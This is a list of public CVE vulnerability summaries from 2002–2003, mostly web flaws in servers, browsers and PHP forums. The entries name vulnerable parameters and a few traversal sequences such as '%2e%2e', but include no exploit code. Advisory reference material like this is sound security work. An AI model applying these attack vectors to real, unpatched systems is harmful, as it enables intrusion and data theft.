[CVE-2003-0715] Heap-based buffer overflow in the Distributed Component Object Model (DCOM) interface in the RPCSS Service allows remote attackers to execute arbitrary code via a malformed DCERPC DCOM object activation request packet with modified length fields, a different vulnerability than CVE-2003-0352 (Blaster/Nachi) and CVE-2003-0528.
[CVE-2003-0712] Cross-site scripting (XSS) vulnerability in the HTML encoding for the Compose New Message form in Microsoft Exchange Server 5.5 Outlook Web Access (OWA) allows remote attackers to execute arbitrary web script.
[CVE-2003-0658] Docview before 1.1-18 in Caldera OpenLinux 3.1.1, SCO Linux 4.0, OpenServer 5.0.7, configures the Apache web server in a way that allows remote attackers to read arbitrary publicly readable files via a certain URL, possibly related to rewrite rules.
[CVE-2003-0640] BEA WebLogic Server and Express, when using NodeManager to start servers, provides Operator users with privileges to overwrite usernames and passwords, which may allow Operators to gain Admin privileges.
[CVE-2003-0636] Novell iChain 2.2 before Support Pack 1 does not properly verify that URL redirects match the DNS name of an accelerator, which allows attackers to redirect URLs to malicious web sites.
[CVE-2003-0632] Buffer overflow in the Oracle Applications Web Report Review (FNDWRR) CGI program (FNDWRR.exe) of Oracle E-Business Suite 11.0 and 11.5.1 through 11.5.8 may allow remote attackers to execute arbitrary code via a long URL.
[CVE-2003-0629] Cross-site scripting (XSS) vulnerability in PeopleSoft IScript environment for PeopleTools 8.43 and earlier allows remote attackers to insert arbitrary web script via a certain HTTP request to IScript.
[CVE-2003-0624] Cross-site scripting (XSS) vulnerability in InteractiveQuery.jsp for BEA WebLogic 8.1 and earlier allows remote attackers to inject malicious web script via the person parameter.
[CVE-2003-0623] Cross-site scripting (XSS) vulnerability in the Administration Console for BEA Tuxedo 8.1 and earlier allows remote attackers to inject arbitrary web script via the INIFILE argument.
[CVE-2003-0621] The Administration Console for BEA Tuxedo 8.1 and earlier allows remote attackers to determine the existence of files outside the web root via modified paths in the INIFILE argument.
[CVE-2003-0615] Cross-site scripting (XSS) vulnerability in start_form() of CGI.pm allows remote attackers to insert web script via a URL that is fed into the form's action parameter.
[CVE-2003-0614] Cross-site scripting (XSS) vulnerability in search.php of Gallery 1.1 through 1.3.4 allows remote attackers to insert arbitrary web script via the searchstring parameter.
[CVE-2003-0605] The RPC DCOM interface in Windows 2000 SP3 and SP4 allows remote attackers to cause a denial of service (crash), and local attackers to use the DoS to hijack the epmapper pipe to gain privileges, via certain messages to the __RemoteGetClassObject interface that cause a NULL pointer to be passed to the PerformScmStage function.
[CVE-2003-0602] Multiple cross-site scripting vulnerabilities (XSS) in Bugzilla 2.16.x before 2.16.3 and 2.17.x before 2.17.4 allow remote attackers to insert arbitrary HTML or web script via (1) multiple default German and Russian HTML templates or (2) ALT and NAME attributes in AREA tags as used by the GraphViz graph generation feature for local dependency graphs.
[CVE-2003-0599] Unknown vulnerability in the Virtual File System (VFS) capability for phpGroupWare 0.9.16preRC and versions before 0.9.14.004 with unknown implications, related to the VFS path being under the web document root.
[CVE-2003-0594] Mozilla allows remote attackers to bypass intended cookie access restrictions on a web application via "%2e%2e" (encoded dot dot) directory traversal sequences in a URL, which causes Mozilla to send the cookie outside the specified URL subsets, e.g. to a vulnerable application that runs on the same server as the target application.
[CVE-2003-0593] Opera allows remote attackers to bypass intended cookie access restrictions on a web application via "%2e%2e" (encoded dot dot) directory traversal sequences in a URL, which causes Opera to send the cookie outside the specified URL subsets, e.g. to a vulnerable application that runs on the same server as the target application.
[CVE-2003-0592] Konqueror in KDE 3.1.3 and earlier (kdelibs) allows remote attackers to bypass intended cookie access restrictions on a web application via "%2e%2e" (encoded dot dot) directory traversal sequences in a URL, which causes Konqueror to send the cookie outside the specified URL subsets, e.g. to a vulnerable application that runs on the same server as the target application.
[CVE-2003-0590] Cross-site scripting (XSS) vulnerability in Splatt Forum allows remote attackers to insert arbitrary HTML and web script via the post icon (image_subject) field.
[CVE-2003-0587] Cross-site scripting (XSS) vulnerability in Infopop Ultimate Bulletin Board (UBB) 6.x allows remote authenticated users to execute arbitrary web script and gain administrative access via the "displayed name" attribute of the "ubber" cookie.
[CVE-2003-0567] Cisco IOS 11.x and 12.0 through 12.2 allows remote attackers to cause a denial of service (traffic block) by sending a particular sequence of IPv4 packets to an interface on the device, causing the input queue on that interface to be marked as full.
[CVE-2003-0559] mainfile.php in phpforum 2 RC-1, and possibly earlier versions, allows remote attackers to execute arbitrary PHP code by modifying the MAIN_PATH parameter to reference a URL on a remote web server that contains the code.
[CVE-2003-0532] Internet Explorer 5.01 SP3 through 6.0 SP1 does not properly determine object types that are returned by web servers, which could allow remote attackers to execute arbitrary code via an object tag with a data parameter to a malicious file hosted on a server that returns an unsafe Content-Type, aka the "Object Type" vulnerability.
[CVE-2003-0528] Heap-based buffer overflow in the Distributed Component Object Model (DCOM) interface in the RPCSS Service allows remote attackers to execute arbitrary code via a malformed RPC request with a long filename parameter, a different vulnerability than CVE-2003-0352 (Blaster/Nachi) and CVE-2003-0715.
[CVE-2003-0526] Cross-site scripting (XSS) vulnerability in Microsoft Internet Security and Acceleration (ISA) Server 2000 allows remote attackers to inject arbitrary web script via a URL containing the script in the domain name portion, which is not properly cleansed in the default error pages (1) 500.htm for "500 Internal Server error" or (2) 404.htm for "404 Not Found."
[CVE-2003-0523] Cross-site scripting (XSS) vulnerability in msg.asp for certain versions of ProductCart allows remote attackers to execute arbitrary web script via the message parameter.
[CVE-2003-0514] Apple Safari allows remote attackers to bypass intended cookie access restrictions on a web application via "%2e%2e" (encoded dot dot) directory traversal sequences in a URL, which causes Safari to send the cookie outside the specified URL subsets, e.g. to a vulnerable application that runs on the same server as the target application.
[CVE-2003-0513] Microsoft Internet Explorer allows remote attackers to bypass intended cookie access restrictions on a web application via "%2e%2e" (encoded dot dot) directory traversal sequences in a URL, which causes Internet Explorer to send the cookie outside the specified URL subsets, e.g. to a vulnerable application that runs on the same server as the target application.
[CVE-2003-0511] The web server for Cisco Aironet AP1x00 Series Wireless devices running certain versions of IOS 12.2 allows remote attackers to cause a denial of service (reload) via a malformed URL.
[CVE-2003-0504] Multiple cross-site scripting (XSS) vulnerabilities in Phpgroupware 0.9.14.003 (aka webdistro) allow remote attackers to insert arbitrary HTML or web script, as demonstrated with a request to index.php in the addressbook module.
[CVE-2003-0495] Cross-site scripting (XSS) vulnerability in LedNews 0.7 allows remote attackers to insert arbitrary web script via a news item.
[CVE-2003-0492] Cross-site scripting (XSS) vulnerability in search.asp for Snitz Forums 3.4.03 and earlier allows remote attackers to execute arbitrary web script via the Search parameter.
[CVE-2003-0488] Multiple cross-site scripting (XSS) vulnerabilities in Kerio MailServer 5.6.3 allow remote attackers to insert arbitrary web script via (1) the add_name parameter in the add_acl module, or (2) the alias parameter in the do_map module.
[CVE-2003-0484] Cross-site scripting (XSS) vulnerability in viewtopic.php for phpBB allows remote attackers to insert arbitrary web script via the topic_id parameter.
[CVE-2003-0481] Multiple cross-site scripting (XSS) vulnerabilities in TUTOS 1.1 allow remote attackers to insert arbitrary web script, as demonstrated using the msg parameter to file_select.php.
[CVE-2003-0479] Cross-site scripting (XSS) vulnerability in the guestbook for WebBBS allows remote attackers to insert arbitrary web script via the (1) Name, (2) Email, or (3) Message fields.
[CVE-2003-0475] Directory traversal vulnerability in iWeb Server 2 allows remote attackers to read arbitrary files via an HTTP request containing URL-encoded .. sequences ("%5c%2e%2e"), a different vulnerability than CVE-2003-0474.
[CVE-2003-0474] Directory traversal vulnerability in iWeb Server allows remote attackers to read arbitrary files via an HTTP request containing .. sequences, a different vulnerability than CVE-2003-0475.
[CVE-2003-0471] Buffer overflow in WebAdmin.exe for WebAdmin allows remote attackers to execute arbitrary code via an HTTP request to WebAdmin.dll with a long USER argument.
[CVE-2003-0459] KDE Konqueror for KDE 3.1.2 and earlier does not remove authentication credentials from URLs of the "user:password@host" form in the HTTP-Referer header, which could allow remote web sites to steal the credentials for pages that link to the sites.
[CVE-2003-0456] VisNetic WebSite 3.5 allows remote attackers to obtain the full pathname of the server via a request containing a folder that does not exist, which leaks the pathname in an error message, as demonstrated using _vti_bin/fpcount.exe.
[CVE-2003-0446] Cross-site scripting (XSS) in Internet Explorer 5.5 and 6.0, possibly in a component that is also used by other Microsoft products, allows remote attackers to insert arbitrary web script via an XML file that contains a parse error, which inserts the script in the resulting error message.
[CVE-2003-0445] Buffer overflow in webfs before 1.17.1 allows remote attackers to execute arbitrary code via an HTTP request with a long Request-URI.
[CVE-2003-0438] eldav WebDAV client for Emacs, version 0.7.2 and earlier, allows local users to create or overwrite arbitrary files via a symlink attack on temporary files.
[CVE-2003-0419] SMC Networks Barricade Wireless Cable/DSL Broadband Router SMC7004VWBR allows remote attackers to cause a denial of service via certain packets to PPTP port 1723 on the internal interface.
[CVE-2003-0413] Cross-site scripting (XSS) vulnerability in the webapps-simple sample application for (1) Sun ONE Application Server 7.0 for Windows 2000/XP or (2) Sun Java System Web Server 6.1 allows remote attackers to insert arbitrary web script or HTML via an HTTP request that generates an "Invalid JSP file" error, which inserts the text in the resulting error message.
[CVE-2003-0409] Buffer overflow in BRS WebWeaver 1.04 and earlier allows remote attackers to cause a denial of service (crash) and possibly execute arbitrary code via a long HTTP (1) POST or (2) HEAD request.
[CVE-2003-0394] objects.inc.php4 in BLNews 2.1.3 allows remote attackers to execute arbitrary PHP code via a Server[path] parameter that points to malicious code on an attacker-controlled web site.
[CVE-2003-0389] Cross-site scripting (XSS) vulnerability in the secure redirect function of RSA ACE/Agent 5.0 for Windows, and 5.x for Web, allows remote attackers to insert arbitrary web script and possibly cause users to enter a passphrase via a GET request containing the script.
[CVE-2003-0381] Multiple vulnerabilities in noweb 2.9 and earlier create temporary files insecurely, which allows local users to overwrite arbitrary files via multiple vectors including the noroff script.
[CVE-2003-0375] Cross-site scripting (XSS) vulnerability in member.php of XMBforum XMB 1.8.x (aka Partagium) allows remote attackers to insert arbitrary HTML and web script via the "member" parameter.
[CVE-2003-0352] Buffer overflow in a certain DCOM interface for RPC in Microsoft Windows NT 4.0, 2000, XP, and Server 2003 allows remote attackers to execute arbitrary code via a malformed message, as exploited by the Blaster/MSblast/LovSAN and Nachi/Welchia worms.
[CVE-2003-0344] Buffer overflow in Microsoft Internet Explorer 5.01, 5.5, and 6.0 allows remote attackers to execute arbitrary code via / (slash) characters in the Type property of an Object tag in a web page.
[CVE-2003-0318] Cross-site scripting (XSS) vulnerability in the Statistics module for PHP-Nuke 6.0 and earlier allows remote attackers to insert arbitrary web script via the year parameter.
[CVE-2003-0315] Snowblind Web Server 1.0 allows remote attackers to cause a denial of service (crash) and possibly execute arbitrary code via a long HTTP request, which may trigger a buffer overflow.
[CVE-2003-0314] Snowblind Web Server 1.0 allows remote attackers to cause a denial of service (crash) via a URL that ends in a "</" sequence.
[CVE-2003-0313] Directory traversal vulnerability in Snowblind Web Server 1.0 allows remote attackers to list arbitrary directory contents via a ... (triple dot) in an HTTP request.
[CVE-2003-0312] Directory traversal vulnerability in Snowblind Web Server 1.0 allows remote attackers to read arbitrary files via a .. (dot dot) in an HTTP request.
[CVE-2003-0310] Cross-site scripting (XSS) vulnerability in articleview.php for eZ publish 2.2 allows remote attackers to insert arbitrary web script.
[CVE-2003-0309] Internet Explorer 5.01, 5.5, and 6.0 allows remote attackers to bypass security zone restrictions and execute arbitrary programs via a web document with a large number of duplicate file:// or other requests that point to the program and open multiple file download dialogs, which eventually cause Internet Explorer to execute the program, as demonstrated using a large number of FRAME or IFRAME tags, aka the "File Download Dialog Vulnerability."
[CVE-2003-0295] Cross-site scripting (XSS) vulnerability in private.php for vBulletin 3.0.0 Beta 2 allows remote attackers to inject arbitrary web script and HTML via the "Preview Message" capability.
[CVE-2003-0292] Cross-site scripting (XSS) vulnerability in Inktomi Traffic-Server 5.5.1 allows remote attackers to insert arbitrary web script or HTML into an error page that appears to come from the domain that the client is visiting, aka "Man-in-the-Middle" XSS.
[CVE-2003-0287] Cross-site scripting (XSS) vulnerability in Movable Type before 2.6, and possibly other versions including 2.63, allows remote attackers to insert arbitrary web script or HTML via the Name textbox, possibly when the "Allow HTML in comments?" option is enabled.
[CVE-2003-0283] Cross-site scripting (XSS) vulnerability in Phorum before 3.4.3 allows remote attackers to inject arbitrary web script and HTML tags via a message with a "<<" before a tag name in the (1) subject, (2) author's name, or (3) author's e-mail.
[CVE-2003-0279] Multiple SQL injection vulnerabilities in the Web_Links module for PHP-Nuke 5.x through 6.5 allow remote attackers to steal sensitive information via numeric fields, as demonstrated using (1) the viewlink function and cid parameter, or (2) index.php.
[CVE-2003-0278] Cross-site scripting (XSS) vulnerability in normal_html.cgi in Happycgi.com Happymall 4.3 and 4.4 allows remote attackers to insert arbitrary web script via the file parameter.
[CVE-2003-0276] Buffer overflow in Pi3Web 2.0.1 allows remote attackers to cause a denial of service (crash) and possibly execute arbitrary code via a GET request with a large number of / characters.
[CVE-2003-0275] SSI.php in YaBB SE 1.5.2 allows remote attackers to execute arbitrary PHP code by modifying the sourcedir parameter to reference a URL on a remote web server that contains the code.
[CVE-2003-0268] SLWebMail 3 on Windows systems allows remote attackers to identify the full path of the server via invalid requests to DLLs such as WebMailReq.dll, which reveals the path in an error message.
[CVE-2003-0267] ShowGodLog.dll in SLWebMail 3 on Windows systems allows remote attackers to read arbitrary files by directly calling ShowGodLog.dll with an argument specifying the full path of the target file.
[CVE-2003-0266] Multiple buffer overflows in SLWebMail 3 on Windows systems allow remote attackers to cause a denial of service and possibly execute arbitrary code via (1) a long Language parameter to showlogin.dll, (2) a long CompanyID parameter to recman.dll, (3) a long CompanyID parameter to admin.dll, or (4) a long CompanyID parameter to globallogin.dll.
[CVE-2003-0240] The web-based administration capability for various Axis Network Camera products allows remote attackers to bypass access restrictions and modify configuration via an HTTP request to the admin/admin.shtml containing a leading // (double slash).
[CVE-2003-0226] Microsoft Internet Information Services (IIS) 5.0 and 5.1 allows remote attackers to cause a denial of service via a long WebDAV request with a (1) PROPFIND or (2) SEARCH method, which generates an error condition that is not properly handled.
[CVE-2003-0224] Buffer overflow in ssinc.dll for Microsoft Internet Information Services (IIS) 5.0 allows local users to execute arbitrary code via a web page with a Server Side Include (SSI) directive with a long filename, aka "Server Side Include Web Pages Buffer Overrun."
[CVE-2003-0217] Cross-site scripting (XSS) vulnerability in Neoteris Instant Virtual Extranet (IVE) 3.01 and earlier allows remote attackers to insert arbitrary web script and bypass authentication via a certain CGI script.
[CVE-2003-0181] Lotus Domino Web Server (nhttp.exe) before 6.0.1 allows remote attackers to cause a denial of service via a "Fictionary Value Field POST request" as demonstrated using the s_Validation form with a long, unknown parameter name.
[CVE-2003-0180] Lotus Domino Web Server (nhttp.exe) before 6.0.1 allows remote attackers to cause a denial of service via an incomplete POST request, as demonstrated using the h_PageUI form.
[CVE-2003-0178] Multiple buffer overflows in Lotus Domino Web Server before 6.0.1 allow remote attackers to cause a denial of service or execute arbitrary code via (1) the s_ViewName option in the PresetFields parameter for iNotes, (2) the Foldername option in the PresetFields parameter for iNotes, or (3) a long Host header, which is inserted into a long Location header and used during a redirect operation.
[CVE-2003-0169] hpnst.exe in the GoAhead-Webs webserver for HP Instant TopTools before 5.55 allows remote attackers to cause a denial of service (CPU consumption) via a request to hpnst.exe that calls itself, which causes an infinite loop.
[CVE-2003-0160] Multiple cross-site scripting (XSS) vulnerabilities in SquirrelMail before 1.2.11 allow remote attackers to inject arbitrary HTML code and steal information from a client's web browser.
[CVE-2003-0154] Cross-site scripting vulnerabilities (XSS) in bonsai Mozilla CVS query tool allow remote attackers to execute arbitrary web script via (1) the file, root, or rev parameters to cvslog.cgi, (2) the file or root parameters to cvsblame.cgi, (3) various parameters to cvsquery.cgi, (4) the person parameter to showcheckins.cgi, (5) the module parameter to cvsqueryform.cgi, and (6) possibly other attack vectors as identified by Mozilla bug #146244.
[CVE-2003-0151] BEA WebLogic Server and Express 6.0 through 7.0 does not properly restrict access to certain internal servlets that perform administrative functions, which allows remote attackers to read arbitrary files or execute arbitrary code.
[CVE-2003-0123] Buffer overflow in Web Retriever client for Lotus Notes/Domino R4.5 through R6 allows remote malicious web servers to cause a denial of service (crash) via a long HTTP status line.
[CVE-2003-0118] SQL injection vulnerability in the Document Tracking and Administration (DTA) website of Microsoft BizTalk Server 2000 and 2002 allows remote attackers to execute operating system commands via a request to (1) rawdocdata.asp or (2) RawCustomSearchField.asp containing an embedded SQL statement.
[CVE-2003-0116] Microsoft Internet Explorer 5.01, 5.5 and 6.0 does not properly check the Cascading Style Sheet input parameter for Modal dialogs, which allows remote attackers to read files on the local system via a web page containing script that creates a dialog and then accesses the target files, aka "Modal Dialog script execution."
[CVE-2003-0115] Microsoft Internet Explorer 5.01, 5.5 and 6.0 does not properly check parameters that are passed during third party rendering, which could allow remote attackers to execute arbitrary web script, aka the "Third Party Plugin Rendering" vulnerability, a different vulnerability than CVE-2003-0233.
[CVE-2003-0114] The file upload control in Microsoft Internet Explorer 5.01, 5.5, and 6.0 allows remote attackers to automatically upload files from the local system via a web page containing a script to upload the files.
[CVE-2003-0109] Buffer overflow in ntdll.dll on Microsoft Windows NT 4.0, Windows NT 4.0 Terminal Server Edition, Windows 2000, and Windows XP allows remote attackers to execute arbitrary code, as demonstrated via a WebDAV request to IIS 5.0.
[CVE-2003-0105] ServerMask 2.2 and earlier does not obfuscate (1) ETag, (2) HTTP Status Message, or (3) Allow HTTP responses, which could tell remote attackers that the web server is an IIS server.
[CVE-2003-0101] miniserv.pl in (1) Webmin before 1.070 and (2) Usermin before 1.000 does not properly handle metacharacters such as line feeds and carriage returns (CRLF) in Base-64 encoded strings during Basic authentication, which allows remote attackers to spoof a session ID and gain root privileges.
[CVE-2003-0044] Multiple cross-site scripting (XSS) vulnerabilities in the (1) examples and (2) ROOT web applications for Jakarta Tomcat 3.x through 3.3.1a allow remote attackers to insert arbitrary web script or HTML.
[CVE-2003-0043] Jakarta Tomcat before 3.3.1a, when used with JDK 1.3.1 or earlier, uses trusted privileges when processing the web.xml file, which could allow remote attackers to read portions of some files through the web.xml file.
[CVE-2003-0038] Cross-site scripting (XSS) vulnerability in options.py for Mailman 2.1 allows remote attackers to inject script or HTML into web pages via the (1) email or (2) language parameters.
[CVE-2003-0019] uml_net in the kernel-utils package for Red Hat Linux 8.0 has incorrect setuid root privileges, which allows local users to modify network interfaces, e.g. by modifying ARP entries or placing interfaces into promiscuous mode.
[CVE-2003-0010] Integer overflow in JsArrayFunctionHeapSort function used by Windows Script Engine for JScript (JScript.dll) on various Windows operating systems allows remote attackers to execute arbitrary code via a malicious web page or HTML e-mail that uses a large array index value that enables a heap-based buffer overflow attack.
[CVE-2003-0001] Multiple ethernet Network Interface Card (NIC) device drivers do not pad frames with null bytes, which allows remote attackers to obtain information from previous packets or kernel memory by using malformed packets, as demonstrated by Etherleak.
[CVE-2002-2437] The JavaScript implementation in Mozilla Firefox before 4.0, Thunderbird before 3.3, and SeaMonkey before 2.1 does not properly restrict the set of values contained in the object returned by the getComputedStyle method, which allows remote attackers to obtain sensitive information about visited web pages by calling this method.
[CVE-2002-2436] The Cascading Style Sheets (CSS) implementation in Mozilla Firefox before 4.0, Thunderbird before 3.3, and SeaMonkey before 2.1 does not properly handle the :visited pseudo-class, which allows remote attackers to obtain sensitive information about visited web pages via a crafted HTML document, a related issue to CVE-2010-2264.
[CVE-2002-2435] The Cascading Style Sheets (CSS) implementation in Microsoft Internet Explorer 8.0 and earlier does not properly handle the :visited pseudo-class, which allows remote attackers to obtain sensitive information about visited web pages via a crafted HTML document, a related issue to CVE-2010-2264.
[CVE-2002-2431] Unspecified vulnerability in GoAhead WebServer before 2.1.4 allows remote attackers to cause "incorrect behavior" via unknown "malicious code," related to incorrect use of the socketInputBuffered function by sockGen.c.
[CVE-2002-2430] GoAhead WebServer before 2.1.1 allows remote attackers to cause a denial of service (CPU consumption) by performing a socket disconnect to terminate a request before it has been fully processed by the server.
[CVE-2002-2429] webs.c in GoAhead WebServer before 2.1.4 allows remote attackers to cause a denial of service (daemon crash) via an HTTP POST request that contains a negative integer in the Content-Length header.
[CVE-2002-2428] webs.c in GoAhead WebServer before 2.1.4 allows remote attackers to cause a denial of service (NULL pointer dereference and daemon crash) via an HTTP POST request that contains a Content-Length header but no body data.
[CVE-2002-2427] The security handler in GoAhead WebServer before 2.1.1 allows remote attackers to bypass authentication and obtain access to protected web content via "an extra slash in a URL," a different vulnerability than CVE-2002-1603.
[CVE-2002-2424] Cross-site scripting (XSS) vulnerability in PHP(Reactor) 1.2.7 pl1 allows remote attackers to inject arbitrary web script or HTML via Javascript in the style attribute of an HTML tag.
[CVE-2002-2422] Cross-site scripting (XSS) vulnerability in Compaq Insight Management Agents 2.0, 2.1, 3.6.0, 4.2 and 4.3.7 allows remote attackers to inject arbitrary web script or HTML via a URL, which inserts the script into the resulting error message.
[CVE-2002-2421] acWEB 1.14 allows remote attackers to cause a denial of service (crash) via an HTTP request for a MS-DOS device name such as COM2.
[CVE-2002-2418] Cross-site scripting (XSS) vulnerability in acFreeProxy (aka acFP) 1.33 beta 7 allows remote attackers to inject arbitrary web script or HTML via the URL, which is inserted into an error page.
[CVE-2002-2416] Directory traversal vulnerability in Zeroo web server 1.5 allows remote attackers to read arbitrary files via a .. (dot dot) in a URL GET request.
[CVE-2002-2415] Allied Telesyn AT-8024 1.3.1 and Rapier 24 switches allow remote authenticated users to cause a denial of service in the management interface via a stream of zero (null) bytes sent via UDP to a running service.
[CVE-2002-2413] WebSite Pro 3.1.11.0 on Windows allows remote attackers to read script source code for files with extensions greater than 3 characters via a URL request that uses the equivalent 8.3 file name.
[CVE-2002-2410] openwebmail.pl in Open WebMail 1.7 and 1.71 reveals sensitive information in error messages and generates different responses whether a user exists or not, which allows remote attackers to identify valid usernames via brute force attacks and obtain certain configuration and version information.
[CVE-2002-2403] Directory traversal vulnerability in KeyFocus web server 1.0.8 allows remote attackers to read arbitrary files for recognized MIME type files via "...", "....", ".....", and other multiple dot sequences.
[CVE-2002-2391] SQL injection vulnerability in index.php of WebChat 1.5 included in XOOPS 1.0 allows remote attackers to execute arbitrary SQL commands via the roomid parameter.
[CVE-2002-2389] TheServer 1.74 web server stores server.ini under the web document root with insufficient access control, which allows remote attackers to obtain cleartext passwords and gain access to server log files.
[CVE-2002-2388] Buffer overflow in INweb POP3 mail server 2.01 allows remote attackers to cause a denial of service (crash) via a long HELO command.
[CVE-2002-2386] Cross-site scripting (XSS) vulnerability in the Quizz module for XOOPS 1.0, when allowing on-line question development, allows remote attackers to inject arbitrary web script or HTML via a javascript: URL in the SRC attribute of an IMG tag.
[CVE-2002-2378] Cross-site scripting (XSS) vulnerability in AN HTTP 1.41d allows remote attackers to inject arbitrary web script or HTML via a colon (:) in the query string, which is inserted into the resulting error page.
[CVE-2002-2377] Cross-site scripting (XSS) vulnerability in addentry.cgi in ZAP 1.0.3 allows remote attackers to inject arbitrary SSI directives, web script, and HTML via the entry field.
[CVE-2002-2376] Cross-site scripting (XSS) vulnerability in E-Guest_sign.pl in E-Guest 1.1 allows remote attackers to inject arbitrary SSI directives, web script, and HTML via the (1) full name, (2) email, (3) homepage, and (4) location parameters. NOTE: this issue might overlap CVE-2005-1605.
[CVE-2002-2375] Directory traversal vulnerability in CommuniGate Pro 4.0b4 and possibly earlier versions allows remote attackers to list the contents of the WebUser directory and its parent directory via a (1) .. (dot dot) or (2) . (dot) in a URL. NOTE: it is not clear whether this issue reveals any more information regarding directory structure than is already available to any CommuniGate Pro user, although there is a possibility that it could be used to infer product version information.
[CVE-2002-2370] SWS web server 0.0.4, 0.0.3 and 0.1.0 allows remote attackers to cause a denial of service (crash) via a URL request that does not end with a newline.
[CVE-2002-2364] Cross-site scripting (XSS) vulnerability in PHP Ticket 0.5 and earlier allows remote attackers to inject arbitrary web script or HTML via a help ticket.
[CVE-2002-2362] Cross-site scripting (XSS) vulnerability in form_header.php in MyMarket 1.71 allows remote attackers to inject arbitrary web script or HTML via the noticemsg parameter.
[CVE-2002-2360] The RPC module in Webmin 0.21 through 0.99, when installed without root or admin privileges, allows remote attackers to read and write to arbitrary files and execute arbitrary commands via remote_foreign_require and remote_foreign_call requests.
[CVE-2002-2359] Cross-site scripting (XSS) vulnerability in the FTP view feature in Mozilla 1.0 allows remote attackers to inject arbitrary web script or HTML via the title tag of an ftp URL.
[CVE-2002-2358] Cross-site scripting (XSS) vulnerability in the FTP view feature in Opera 6.0 and 6.01 through 6.04 allows remote attackers to inject arbitrary web script or HTML via the title tag of an FTP URL.
[CVE-2002-2350] Cross-site scripting (XSS) vulnerability in z_user_show.php in dbtreelistproperty_method.php in Zorum 2.4 allows remote attackers to inject arbitrary web script or HTML via the class parameter.
[CVE-2002-2348] Cross-site scripting (XSS) vulnerability in athcgi.exe in Authoria HR allows remote attackers to inject arbitrary web script or HTML via the command parameter.
[CVE-2002-2347] Cross-site scripting (XSS) vulnerability in Oracle Java Server Page (OJSP) demo files (1) hellouser.jsp, (2) welcomeuser.jsp and (3) usebean.jsp in Oracle 9i Application Server 9.0.2, 1.0.2.2, 1.0.2.1s and 1.0.2 allows remote attackers to inject arbitrary web script or HTML via the text entry field.
[CVE-2002-2344] Ensim WEBppliance 3.0 and 3.1 allows remote attackers to read mail intended for other users by defining an alias that is the target's email address.
[CVE-2002-2343] Cross-site scripting (XSS) vulnerability in NOCC 0.9 through 0.9.5 allows remote attackers to inject arbitrary web script or HTML via email messages.
[CVE-2002-2342] Bannermatic 1, 2, and 3 stores the (1) ban.log, (2) ban.bak, (3) ban.dat and (4) banmat.pwd data files under the web document root with insufficient access control, which allows attackers to obtain sensitive information via a direct request for the files.
[CVE-2002-2341] Cross-site scripting (XSS) vulnerability in content blocking in SonicWALL SOHO3 6.3.0.0 allows remote attackers to inject arbitrary web script or HTML via a blocked URL.
[CVE-2002-2340] Cross-site scripting (XSS) vulnerability in read.php in Phorum 3.3.2a allows remote attackers to inject arbitrary web script or HTML via (1) the t parameter or (2) the body of an email response.
[CVE-2002-2339] Cross-site scripting (XSS) vulnerability in configure.asp in Script-Shed GuestBook 1.0 allows remote attackers to inject arbitrary web script or HTML via a javascript: URL in (1) image, (2) img, (3) image=right, (4) img=right, (5) image=left, and (6) img=left tags.
[CVE-2002-2335] Killer Protection 1.0 stores the vars.inc include file under the web root with insufficient access control, which allows remote attackers to obtain user names and passwords and log in using protection.php.
[CVE-2002-2330] Cross-site scripting (XSS) vulnerability in stat.pl in StatsPlus 1.25 allows remote attackers to inject arbitrary web script or HTML via (1) HTTP_USER_AGENT or (2) HTTP_REFERER, which is written to stats.html and executed in client browsers.
[CVE-2002-2322] Ultimate PHP Board (UPB) 1.0b stores the users.dat data file under the web root with insufficient access control, which allows remote attackers to obtain usernames and passwords.
[CVE-2002-2321] Cross-site scripting (XSS) vulnerability in (1) showcat.php and (2) addyoursite.php in phpLinkat 0.1.0 allows remote attackers to inject arbitrary web script or HTML via the catid parameter.
[CVE-2002-2318] Cross-site scripting (XSS) vulnerability in Falcon web server 2.0.0.1009 through 2.0.0.1021 allows remote attackers to inject arbitrary web script or HTML via the URI, which is inserted into 301 error messages and executed by 404 error messages.
[CVE-2002-2312] Opera 6.0.1 allows remote attackers to upload arbitrary file contents when users press a key corresponding to the JavaScript (1) event.ctrlKey or (2) event.shiftKey onkeydown event contained in a webpage.
[CVE-2002-2311] Microsoft Internet Explorer 6.0 and possibly others allows remote attackers to upload arbitrary file contents when users press a key corresponding to the JavaScript (1) event.ctrlKey or (2) event.shiftKey onkeydown event contained in a webpage. NOTE: it was reported that the vendor has disputed the severity of this issue.
[CVE-2002-2310] ClickCartPro 4.0 stores the admin_user.db data file under the web document root with insufficient access control on servers other than Apache, which allows remote attackers to obtain usernames and passwords.
[CVE-2002-2308] Netscape Communicator 6.2.1 allows remote attackers to cause a denial of service in client browsers via a webpage containing a recursive META refresh tag where the content tag is blank and the URL tag references itself.
[CVE-2002-2296] Cross-site scripting (XSS) vulnerability in YaBB.pl in Yet Another Bulletin Board (YaBB) 1 Gold SP 1 allows remote attackers to inject arbitrary web script or HTML via the num parameter.
[CVE-2002-2293] Webshots Desktop screensaver allows local users to bypass the password on the screensaver by pressing CTRL-ALT-DELETE and (1) hitting the cancel button or (2) killing the screensaver from the task manager.
[CVE-2002-2282] McAfee VirusScan 4.5.1, when the WebScanX.exe module is enabled, searches for particular DLLs from the user's home directory, even when browsing the local hard drive, which allows local users to run arbitrary code via malicious versions of those DLLs.
[CVE-2002-2278] Cross-site scripting (XSS) vulnerability in mod_search/index.php in PortailPHP 0.99 allows remote attackers to inject arbitrary web script or HTML via the (1) $App_Theme, (2) $Rub_Search, (3) $Rub_News, (4) $Rub_File, (5) $Rub_Liens, or (6) $Rub_Faq variables.
[CVE-2002-2273] Cross-site scripting (XSS) vulnerability in Webster HTTP Server allows remote attackers to inject arbitrary web script or HTML via the URL.
[CVE-2002-2269] Directory traversal vulnerability in Webster HTTP Server allows remote attackers to read arbitrary files via a .. (dot dot) in the URL.
[CVE-2002-2268] Buffer overflow in Webster HTTP Server allows remote attackers to execute arbitrary code via a long URL.
[CVE-2002-2260] Cross-site scripting (XSS) vulnerability in the quips feature in Mozilla Bugzilla 2.10 through 2.17 allows remote attackers to inject arbitrary web script or HTML via the "show all quips" page.
[CVE-2002-2256] Directory traversal vulnerability in pWins Webserver 0.2.5 and earlier allows remote attackers to read arbitrary files via Unicode characters.
[CVE-2002-2255] Cross-site scripting (XSS) vulnerability in search.php in phpBB 2.0.3 and possibly earlier versions allows remote attackers to inject arbitrary web script or HTML via the search_username parameter in searchuser mode.
[CVE-2002-2247] The administrator/phpinfo.php script in Mambo Site Server 4.0.11 allows remote attackers to obtain sensitive information such as the full web root path via phpinfo.php, which calls the phpinfo function.
